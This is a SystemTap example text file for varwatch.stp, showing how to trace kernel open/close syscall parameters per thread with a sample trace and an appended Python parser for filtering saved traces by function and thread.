Current File : /usr/share/systemtap/examples/general/varwatch.txt
varwatch.stp - Watch a Variable Changing Value in a Thread

  This script places a set of probes (specified by $1), each of which monitors
  the state of some context $variable expression (specified by $2).  Whenever
  the value changes, with respect to the active thread, the event is traced.

$ stap -w varwatch.stp 'kernel.function("sys_*@fs/open.c:*")' \
'$$parms' -c "ls > /dev/null"

sh[32715] kernel.function("SyS_access@fs/open.c:395") $$parms:
filename=0x7f340e5cb750 mode=0x4
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e5ca048 flags=0x80000 mode=0x1
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e7c22cb flags=0x80000 mode=0x7f340e7d0168
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e7c9e89 flags=0x80000 mode=0x7f340e7d0168
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e7caf39 flags=0x80000 mode=0x7f340e7d0168
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x4a8ddf flags=0x802 mode=0x6eb0c8
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340df403d0 flags=0x80000 mode=0x7f340e17a768
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340df3d2ea flags=0x80000 mode=0x1b6
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340df3ea80 flags=0x0 mode=0x0
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
[...]

The output traces the parameters of the sys_* functions in fs/open.c.
The probe specification can be narrowed to follow a single function,
for example sys_close, throughout a process's lifetime.
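
For post-processing a saved trace, the following added example (not part of the SystemTap distribution) parses the two-line records shown above and narrows them to one function and, optionally, one thread. The names parse_varwatch and follow are hypothetical, and reading '?' as "value not resolvable at that probe point" is an assumption.

```python
import re

# Header line of a varwatch record: execname[tid] probe-point expression:
HEADER = re.compile(
    r'^(?P<exe>\S+)\[(?P<tid>\d+)\] '
    r'kernel\.function\("(?P<func>[^@"]+)@(?P<src>[^"]+)"\) (?P<expr>\S+):$')

def parse_value(text):
    """0x-prefixed values become ints; '?' (assumed: unresolvable) becomes None."""
    if text == "?":
        return None
    return int(text, 16) if text.startswith("0x") else text

def parse_varwatch(lines):
    """Pair each header line with the value line after it; skip the rest ('[...]')."""
    records, header = [], None
    for raw in lines:
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            header = m.groupdict()
            continue
        if header and "=" in line:
            pairs = (p.split("=", 1) for p in line.split() if "=" in p)
            params = {k: parse_value(v) for k, v in pairs}
            records.append({**header, "tid": int(header["tid"]), "params": params})
        header = None
    return records

def follow(records, func, tid=None):
    """Narrow the trace to one function, optionally to one thread id."""
    return [r for r in records if r["func"] == func and (tid is None or r["tid"] == tid)]

# Sample lines copied from the trace shown above.
SAMPLE = '''\
sh[32715] kernel.function("SyS_access@fs/open.c:395") $$parms:
filename=0x7f340e5cb750 mode=0x4
sh[32715] kernel.function("SyS_open@fs/open.c:992") $$parms:
filename=0x7f340e5ca048 flags=0x80000 mode=0x1
sh[32715] kernel.function("SyS_close@fs/open.c:1053") $$parms:
fd=0x3
sh[32715] kernel.function("SyS_close@fs/open.c:1058") $$parms:
fd=?
[...]
'''.splitlines()

if __name__ == "__main__":
    for r in follow(parse_varwatch(SAMPLE), "SyS_close"):
        print(r["tid"], r["src"], r["params"])
```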

